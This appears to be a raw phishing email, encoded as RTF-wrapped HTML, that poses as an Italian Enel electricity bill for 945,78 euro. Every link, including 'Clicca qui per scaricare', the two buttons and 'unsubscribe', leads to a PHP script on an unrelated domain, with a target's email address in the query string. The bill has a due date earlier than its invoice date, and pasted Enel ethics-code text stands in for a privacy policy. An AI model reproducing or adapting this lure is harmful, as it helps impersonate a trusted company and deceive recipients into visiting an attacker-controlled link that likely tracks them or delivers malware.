{\rtf1\ansi\ansicpg1252\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss\fcharset0 Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag19 <html>}
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag177 <title>}
{\*\htmltag241 Untitled Document}
{\*\htmltag185 </title>}
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag50 <body>}
{\*\htmltag0 \par }
{\*\htmltag96 <table style="WIDTH: 800px; BORDER-COLLAPSE: collapse; FONT-FAMILY: 'Trebuchet MS', Arial, Helvetica, sans-serif; FONT-SIZE: 12px">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag96 <tbody>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="PADDING-BOTTOM: 15px; PADDING-LEFT: 50px; PADDING-RIGHT: 28px; HEIGHT: 120px; PADDING-TOP: 35px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="POSITION: relative; LINE-HEIGHT: 1.5em; WIDTH: 294px; FONT-FAMILY: Arial, Helvetica, sans-serif; FLOAT: left; HEIGHT: 67px; COLOR: #0d4ba0; FONT-SIZE: 50px; FONT-WEIGHT: bold; TEXT-DECORATION: none" href="#">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <img style="Z-INDEX: 5; POSITION: absolute; FONT-STYLE: italic; TOP: 0px; LEFT: 0px" alt="Enel" src="http://michaelpetitti.com/zYR5Nc/blnF4vVXJIa59oN.jpg">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/blnF4vVXJIa59oN.jpg"}}{\fldrslt\cf1\ul {\chbrdr\brdrsh Enel}}}\htmlrtf0 Enel\htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>} 
{\*\htmltag84 <span style="POSITION: relative; WIDTH: 390px; FLOAT: right; COLOR: #1b1b1b; FONT-SIZE: 16px; TOP: 10px">}\htmlrtf {\htmlrtf0 ENEL 
{\*\htmltag4 \par }
{\*\htmltag84       }SERVIZIO ELETTRICO - Servizio di Maggior Tutela
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <span style="FONT-SIZE: 20px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <img style="POSITION: relative; PADDING-BOTTOM: 5px; PADDING-RIGHT: 10px; DISPLAY: inline-block; VERTICAL-ALIGN: middle" alt="DATI" src="http://michaelpetitti.com/zYR5Nc/imEz5yeV.jpg">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/imEz5yeV.jpg"}}{\fldrslt\cf1\ul {\chbrdr\brdrsh DATI}}}\htmlrtf0 DATI 
{\*\htmltag4 \par }
{\*\htmltag84       }CLIENTE
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <span style="POSITION: relative; PADDING-BOTTOM: 0px; MARGIN: 0px -2px; PADDING-LEFT: 2px; WIDTH: 314px; PADDING-RIGHT: 2px; DISPLAY: block; BACKGROUND: #bfbfbf; FONT-SIZE: 18px; PADDING-TOP: 0px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="POSITION: relative; WIDTH: 146px; DISPLAY: inline-block">}\htmlrtf {\htmlrtf0 Numero 
{\*\htmltag4 \par }
{\*\htmltag84       }cliente:
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0  326 480 
{\*\htmltag4 \par }
{\*\htmltag84       }805 
{\*\htmltag84 <img style="POSITION: absolute; TOP: 0px; RIGHT: -72px" alt="NUMERO" src="http://michaelpetitti.com/zYR5Nc/BWILtMyqbG1ZS2.jpg">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/BWILtMyqbG1ZS2.jpg"}}{\fldrslt\cf1\ul {\chbrdr\brdrsh NUMERO}}}\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag4  }
{\*\htmltag84 <span style="DISPLAY: block; FONT-SIZE: 16px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="WIDTH: 146px; DISPLAY: inline-block">}\htmlrtf {\htmlrtf0 Codice Fiscale:
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84       }YEL395IRSE
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 \htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td style="PADDING-BOTTOM: 15px; PADDING-LEFT: 50px; PADDING-RIGHT: 28px; PADDING-TOP: 0px">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag68 <p style="MARGIN: 19px 0px; FONT-SIZE: 17px">}\htmlrtf }\htmlrtf0 \htmlrtf}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="FONT-SIZE: 20px">}\htmlrtf {\htmlrtf0 BOLLETTA PER LA FORNITURA DI 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag84 <strong>}\htmlrtf {\b \htmlrtf0 ENERGIA ELETTRICA
{\*\htmltag92 </strong>}\htmlrtf }\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <span style="FONT-SIZE: 18px">}\htmlrtf {\htmlrtf0 N. fattura 
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag84 <strong>}\htmlrtf {\b \htmlrtf0 89015419
{\*\htmltag92 </strong>}\htmlrtf }\htmlrtf0  del 6/07/2016 Bimestre 
{\*\htmltag4 \par }
{\*\htmltag84       }giugno-luglio 2016
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <span style="BORDER-BOTTOM: #000 1px solid; WIDTH: 608px; DISPLAY: block; MARGIN-BOTTOM: 35px; HEIGHT: 30px; FONT-SIZE: 18px; FONT-WEIGHT: bold">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="POSITION: relative; FLOAT: left; TOP: 6px">}\htmlrtf {\htmlrtf0 Totale da pagare entro 
{\*\htmltag4 \par }
{\*\htmltag84       }il 31/05/2016: 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 <span style="FLOAT: right">}\htmlrtf {\htmlrtf0 euro 
{\*\htmltag84 <span style="FONT-SIZE: 25px">}\htmlrtf {\htmlrtf0 945,78
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0  
{\*\htmltag4 \par }
{\*\htmltag84       }
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p style="MARGIN: 19px 0px">}\htmlrtf {\htmlrtf0 Come da lei richiesto, sar\'e0 addebitato nel 
{\*\htmltag4 \par }
{\*\htmltag84       }giorno esatto della scadenza su conto corrente presso: 
{\*\htmltag4 \par }
{\*\htmltag84       }83302591 
{\*\htmltag116 <br>}\htmlrtf \line
\htmlrtf0 
{\*\htmltag84 <a style="COLOR: #f44e12" href="http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" \\n}}{\fldrslt\cf1\ul \htmlrtf0 Clicca qui per scaricare\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p style="MARGIN: 19px 0px">}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <a style="TEXT-ALIGN: center; PADDING-BOTTOM: 0px; LINE-HEIGHT: 2.5em; TEXT-TRANSFORM: uppercase; MARGIN: 15px 8px 19px 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; DISPLAY: inline-block; BACKGROUND: #1e3d8f; HEIGHT: 39px; COLOR: #fff; FONT-SIZE: 15px; TEXT-DECORATION: none; PADDING-TOP: 0px" href="http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" \\n}}{\fldrslt\cf1\ul \htmlrtf0 DATI FORNITURA\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag84 <a style="TEXT-ALIGN: center; PADDING-BOTTOM: 0px; LINE-HEIGHT: 2.5em; TEXT-TRANSFORM: uppercase; MARGIN: 15px 8px 19px 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; DISPLAY: inline-block; BACKGROUND: #1e3d8f; HEIGHT: 39px; COLOR: #fff; FONT-SIZE: 15px; TEXT-DECORATION: none; PADDING-TOP: 0px" href="http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" \\n}}{\fldrslt\cf1\ul \htmlrtf0 RIEPILOGO IMPORTI FATTURATI\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 Politica sulla privacy\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 Introduction 1. INTRODUCTION 1) Hereinafter, \'93Enel\'94 will refer to Enel 
{\*\htmltag4 \par }
{\*\htmltag84       }SpA and all of its direct and indirect subsidiaries. Introduzione 1. 
{\*\htmltag4 \par }
{\*\htmltag84       }INTRODUZIONE 1) Nel seguito si indicheranno con \'93Enel\'94, Enel SpA e tutte 
{\*\htmltag4 \par }
{\*\htmltag84       }le Societ\'e0 da essa controllate, direttamente e/o indirettamente. Questo 
{\*\htmltag4 \par }
{\*\htmltag84       }Codice esprime gli impegni e le responsabilit\'e0 etiche nella conduzione 
{\*\htmltag4 \par }
{\*\htmltag84       }degli affari e delle attivit\'e0 aziendali assunti dai collaboratori di Enel 
{\*\htmltag4 \par }
{\*\htmltag84       }SpA e delle Societ\'e0 da essa controllate 1 , siano essi amministratori o 
{\*\htmltag4 \par }
{\*\htmltag84       }dipendenti in ogni accezione di tali imprese. La nostra missione \'93In Enel 
{\*\htmltag4 \par }
{\*\htmltag84       }abbiamo la missione di generare e distribuire valore nel mercato 
{\*\htmltag4 \par }
{\*\htmltag84       }internazionale dell\'92energia, a vantaggio delle esigenze dei clienti, 
{\*\htmltag4 \par }
{\*\htmltag84       }dell\'92investimento degli azionisti, della competitivit\'e0 dei Paesi in cui 
{\*\htmltag4 \par }
{\*\htmltag84       }operiamo e delle aspettative di tutti quelli che lavorano con noi. Enel 
{\*\htmltag4 \par }
{\*\htmltag84       }opera al servizio delle comunit\'e0, nel rispetto dell\'92ambiente e della 
{\*\htmltag4 \par }
{\*\htmltag84       }sicurezza delle persone, con l\'92impegno di assicurare alle prossime 
{\*\htmltag4 \par }
{\*\htmltag84       }generazioni un mondo migliore.\'94\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240       }
{\*\htmltag64 <p>}\htmlrtf {\htmlrtf0 clicca qui per cancellare l'iscrizione 
{\*\htmltag84 <a style="COLOR: #f44e12" href="http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://michaelpetitti.com/zYR5Nc/aXJeqLS.php?id=info@studiolegalezecca.com" \\n}}{\fldrslt\cf1\ul \htmlrtf0 unsubscribe\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag248 </td>}
{\*\htmltag72 </tr>}
{\*\htmltag104 </tbody>}
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag58 </body>}
{\*\htmltag27 </html>}
{\*\htmltag3 \par }} 1c

08
1f2‚